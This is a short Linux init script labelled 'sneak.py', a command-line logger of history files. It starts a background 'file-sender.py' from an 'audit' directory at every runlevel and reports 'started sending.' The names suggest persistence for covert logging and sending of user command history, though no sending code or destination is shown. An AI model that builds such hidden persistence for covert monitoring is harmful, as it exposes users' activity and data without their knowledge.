#!/bin/sh
# chkconfig: 123456 90 10
# sneak.py - Linux command-line logger (streamline history files)
#

workdir=/usr/local/bin/audit

start() {
    cd $workdir
    python3 file-sender.py &
    echo "started sending."
}

status() {
    pid_status=$(ps aux | grep file-sender.py | grep -v grep)
    echo $pid_status
}

stop() {
    pid=$(ps aux | grep file-sender.py | grep -v grep | awk '{print $2}')
    kill $pid
    sleep 2
}

case "$1" in
  start)
    start
    ;;
  stop)
    stop
    ;;
  restart)
    stop
    start
    ;;
  status)
    status
    ;;
  *)
    echo "Usage: /etc/init.d/StartConnection {start|stop|restart|status}"
    exit 1
esac
exit 0
